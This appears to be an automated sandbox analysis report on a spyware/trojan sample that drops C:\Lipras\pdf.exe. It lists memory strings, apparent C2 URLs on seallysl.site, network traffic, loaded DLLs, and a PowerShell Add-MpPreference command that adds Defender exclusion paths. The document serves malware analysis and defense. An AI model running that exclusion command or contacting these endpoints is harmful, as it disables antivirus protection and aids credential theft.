Source: pdf.exe, 00000007.00000003.2111218031.00000000008C5000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000002.2180058428.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2111335907.00000000008CB000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2111066004.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2175105603.00000000008D1000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2175040288.00000000008CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://seallysl.site/api$
Source: pdf.exe, 00000007.00000003.2111218031.00000000008C5000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2101548903.00000000008C5000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2101608351.00000000008CB000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2111335907.00000000008CB000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2111066004.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2175105603.00000000008D1000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2175040288.00000000008CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://seallysl.site/apiH
Source: pdf.exe, 00000007.00000003.2050172748.00000000008CC000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2111218031.00000000008C5000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2101548903.00000000008C5000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2101608351.00000000008CB000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2111335907.00000000008CB000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2111066004.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2175105603.00000000008D1000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2175040288.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.2004766910.00000000008CC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://seallysl.site/apif
Source: pdf.exe, 00000007.00000003.2050172748.00000000008CC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://seallysl.site/e
Source: pdf.exe, 00000007.00000002.2179825249.000000000085A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://seallysl.site/qt
Source: pdf.exe, 00000007.00000002.2179825249.000000000085A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://seallysl.site/t
Source: pdf.exe, 00000007.00000003.1927351008.0000000003880000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.microsof
Source: pdf.exe, 00000007.00000003.2005843013.0000000003940000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: pdf.exe, 00000007.00000003.2005843013.0000000003940000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: pdf.exe, 00000007.00000003.1927351008.000000000387E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: pdf.exe, 00000007.00000003.1927351008.000000000387E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: pdf.exe, 00000007.00000003.2006177522.00000000008DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: pdf.exe, 00000007.00000003.1927623634.0000000003869000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: pdf.exe, 00000007.00000003.2006177522.00000000008DA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: pdf.exe, 00000007.00000003.1927623634.0000000003869000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: pdf.exe, 00000007.00000003.2005843013.0000000003940000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: pdf.exe, 00000007.00000003.2005843013.0000000003940000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: pdf.exe, 00000007.00000003.2005843013.0000000003940000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: pdf.exe, 00000007.00000003.2005843013.0000000003940000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: pdf.exe, 00000007.00000003.2005843013.0000000003940000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown HTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.180.76:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.180.76:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.180.76:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.180.76:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.180.76:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.180.76:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.180.76:443 -> 192.168.2.4:49744 version: TLS 1.2

System Summary
barindex
PE file has nameless sections
Source: pdf.exe.0.dr Static PE information: section name:
Source: pdf.exe.0.dr Static PE information: section name:
Source: pdf.exe.0.dr Static PE information: section name:
Source: pdf.exe.0.dr Static PE information: section name:
Source: pdf.exe.0.dr Static PE information: section name:
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\file.exe Process Stats: CPU usage > 49%
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009B09B8 0_2_009B09B8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_04C6B4C8 2_2_04C6B4C8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_04C6B4B8 2_2_04C6B4B8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_08C63AA8 2_2_08C63AA8
Source: C:\Lipras\pdf.exe Code function: 7_2_00040130 7_2_00040130
Source: C:\Lipras\pdf.exe Code function: 7_2_0003F970 7_2_0003F970
Source: C:\Lipras\pdf.exe Code function: 7_2_0006A2E0 7_2_0006A2E0
Source: C:\Lipras\pdf.exe Code function: 7_2_0005EB60 7_2_0005EB60
Source: C:\Lipras\pdf.exe Code function: 7_2_0004D5AF 7_2_0004D5AF
Source: C:\Lipras\pdf.exe Code function: 7_2_00074620 7_2_00074620
Source: C:\Lipras\pdf.exe Code function: 7_2_0005A6D0 7_2_0005A6D0
Source: C:\Lipras\pdf.exe Code function: 7_2_0004482A 7_2_0004482A
Source: C:\Lipras\pdf.exe Code function: 7_2_00072850 7_2_00072850
Source: C:\Lipras\pdf.exe Code function: 7_2_000400C7 7_2_000400C7
Source: C:\Lipras\pdf.exe Code function: 7_2_000338E0 7_2_000338E0
Source: C:\Lipras\pdf.exe Code function: 7_2_0004011A 7_2_0004011A
Source: C:\Lipras\pdf.exe Code function: 7_2_00074920 7_2_00074920
Source: C:\Lipras\pdf.exe Code function: 7_2_00069940 7_2_00069940
Source: C:\Lipras\pdf.exe Code function: 7_2_00037A14 7_2_00037A14
Source: C:\Lipras\pdf.exe Code function: 7_2_0005AA40 7_2_0005AA40
Source: C:\Lipras\pdf.exe Code function: 7_2_0003F250 7_2_0003F250
Source: C:\Lipras\pdf.exe Code function: 7_2_0003A270 7_2_0003A270
Source: C:\Lipras\pdf.exe Code function: 7_2_0003C277 7_2_0003C277
Source: C:\Lipras\pdf.exe Code function: 7_2_0004E298 7_2_0004E298
Source: C:\Lipras\pdf.exe Code function: 7_2_000732C0 7_2_000732C0
Source: C:\Lipras\pdf.exe Code function: 7_2_0003DB20 7_2_0003DB20
Source: C:\Lipras\pdf.exe Code function: 7_2_00051B40 7_2_00051B40
Source: C:\Lipras\pdf.exe Code function: 7_2_00069BA0 7_2_00069BA0
Source: C:\Lipras\pdf.exe Code function: 7_2_000733B0 7_2_000733B0
Source: C:\Lipras\pdf.exe Code function: 7_2_00044BBF 7_2_00044BBF
Source: C:\Lipras\pdf.exe Code function: 7_2_00045BD8 7_2_00045BD8
Source: C:\Lipras\pdf.exe Code function: 7_2_0005C3E0 7_2_0005C3E0
Source: C:\Lipras\pdf.exe Code function: 7_2_0006EC20 7_2_0006EC20
Source: C:\Lipras\pdf.exe Code function: 7_2_00064C60 7_2_00064C60
Source: C:\Lipras\pdf.exe Code function: 7_2_000394BF 7_2_000394BF
Source: C:\Lipras\pdf.exe Code function: 7_2_0003ECC0 7_2_0003ECC0
Source: C:\Lipras\pdf.exe Code function: 7_2_0004ECDE 7_2_0004ECDE
Source: C:\Lipras\pdf.exe Code function: 7_2_00059D00 7_2_00059D00
Source: C:\Lipras\pdf.exe Code function: 7_2_0003BD70 7_2_0003BD70
Source: C:\Lipras\pdf.exe Code function: 7_2_00038DA0 7_2_00038DA0
Source: C:\Lipras\pdf.exe Code function: 7_2_000635B0 7_2_000635B0
Source: C:\Lipras\pdf.exe Code function: 7_2_0003ADD0 7_2_0003ADD0
Source: C:\Lipras\pdf.exe Code function: 7_2_00046E10 7_2_00046E10
Source: C:\Lipras\pdf.exe Code function: 7_2_0003D760 7_2_0003D760
Source: C:\Lipras\pdf.exe Code function: 7_2_00064F80 7_2_00064F80
Source: C:\Lipras\pdf.exe Code function: 7_2_0003279D 7_2_0003279D
Source: C:\Lipras\pdf.exe Code function: 7_2_00039F9C 7_2_00039F9C
Source: C:\Lipras\pdf.exe Code function: 7_2_00034FA0 7_2_00034FA0
Source: C:\Lipras\pdf.exe Code function: 7_2_0003279D 7_2_0003279D
Source: C:\Lipras\pdf.exe Code function: 7_2_02633E11 7_2_02633E11
Source: C:\Lipras\pdf.exe Code function: 7_2_02633CD7 7_2_02633CD7
Source: C:\Lipras\pdf.exe Code function: 7_2_02634BF9 7_2_02634BF9
Found potential string decryption / allocating functions
Source: C:\Lipras\pdf.exe Code function: String function: 0003C8C0 appears 38 times
Source: C:\Lipras\pdf.exe Code function: String function: 0004C2A0 appears 82 times
Sample file is different than original file name gathered from version info
Source: file.exe, 00000000.00000000.1669953044.0000000000068000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameSession.exe0 vs file.exe
Source: file.exe, 00000000.00000002.4139998465.00000000006BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs file.exe
Source: file.exe Binary or memory string: OriginalFilenameSession.exe0 vs file.exe
Source: pdf.exe.0.dr Static PE information: Section: ZLIB complexity 0.9979495662811388
Source: pdf.exe.0.dr Static PE information: Section: ZLIB complexity 1.0011935763888888
Source: pdf.exe.0.dr Static PE information: Section: .data ZLIB complexity 0.9975373178785403
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@10/11@4/3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7432:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7308:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vszyjc0t.wog.ps1 Jump to behavior
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Lipras\pdf.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Lipras\pdf.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: file.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: pdf.exe, 00000007.00000003.1927439015.0000000003856000.00000004.00000800.00020000.00000000.sdmp, pdf.exe, 00000007.00000003.1927798943.000000000383A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Lipras'; Add-MpPreference -ExclusionPath 'C:\Users'"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Lipras
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\file.exe Process created: C:\Lipras\pdf.exe "C:\Lipras\pdf.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Lipras'; Add-MpPreference -ExclusionPath 'C:\Users'" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Lipras\pdf.exe "C:\Lipras\pdf.exe" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Lipras Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll Jump to behavior
